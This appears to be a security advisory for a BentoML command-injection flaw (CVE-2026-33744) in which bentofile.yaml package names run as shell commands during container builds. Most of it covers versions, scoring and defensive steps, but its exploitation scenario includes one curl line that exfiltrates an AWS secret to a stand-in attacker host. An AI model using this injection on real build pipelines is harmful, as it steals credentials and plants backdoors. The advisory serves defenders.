CVE-2026-33744 — HIGH (CVSS 7.8) AI Security Vulnerability

CISO Take

Any team running `bentoml containerize` on untrusted or externally-sourced bentofile.yaml files is exposed to arbitrary command execution at build time — a classic supply-chain injection point in MLOps pipelines. Patch to BentoML 1.4.37 immediately and treat bentofile.yaml with the same scrutiny as Dockerfile or CI/CD scripts. If you cannot patch, block unreviewed bentofile.yaml ingestion in your build pipelines.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
bentoml	pip	<= 1.4.36	`1.4.37`

Do you use bentoml? You're affected.

Severity & Risk

CVSS 3.1

7.8 / 10

EPSS

N/A

KEV Status

Not in KEV

Sophistication

Trivial

Recommended Action

1. PATCH: Upgrade BentoML to >=1.4.37 immediately on all build hosts and CI/CD agents. 2. AUDIT: Review all bentofile.yaml files in your repositories for suspicious entries in `system_packages` — values containing semicolons, ampersands, pipes, backticks, or `$()` are red flags. 3. GATE: Add a pre-build lint step (grep/regex) to reject bentofile.yaml with non-alphanumeric characters in `system_packages`. 4. ISOLATE: Run `bentoml containerize` in ephemeral, network-restricted build environments (no cloud metadata endpoint access, no production credential mounts). 5. DETECT: Alert on unexpected outbound connections or file writes during Docker build phases in your SIEM/build logging.

Classification

Code Execution Supply Chain Framework AML.T0010.001 - AI Software AML.T0010.004 - Container Registry AML.T0011 - User Execution AML.T0050 - Command and Scripting Interpreter AML.T0079 - Stage Capabilities

Compliance Impact

This CVE is relevant to:

EU AI Act

Art. 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.6.2.6 - Information security measures for AI systems A.8.4 - AI system third-party and supply chain

NIST AI RMF

GOVERN 6.1 - Policies and procedures are in place for AI supply chain risk management MANAGE 2.2 - Mechanisms are in place to inventory AI systems and their components

OWASP LLM Top 10

LLM03:2025 - Supply Chain Vulnerabilities

Technical Details

NVD Description

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.37, the `docker.system_packages` field in `bentofile.yaml` accepts arbitrary strings that are interpolated directly into Dockerfile `RUN` commands without sanitization. Since `system_packages` is semantically a list of OS package names (data), users do not expect values to be interpreted as shell commands. A malicious `bentofile.yaml` achieves arbitrary command execution during `bentoml containerize` / `docker build`. Version 1.4.37 fixes the issue.

Exploitation Scenario

A threat actor targeting an ML engineering team submits a pull request to an open-source BentoML model repository, modifying bentofile.yaml to include a malicious system_packages entry such as `curl http://attacker.com/exfil?k=$(cat /run/secrets/aws_key)`. When a developer or CI/CD pipeline runs `bentoml containerize` to build the model's serving container — a routine step before deployment — the injected command executes during the Docker RUN layer, exfiltrating build secrets or installing a persistent backdoor into the resulting container image. The compromised image is then pushed to the container registry and deployed to production model serving infrastructure.

Weaknesses (CWE)

CWE-94 Primary CWE-94 Improper Control of Generation of Code ('Code Injection') Primary

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

References

Timeline

Published

March 27, 2026

Last Modified

March 27, 2026

First Seen

March 27, 2026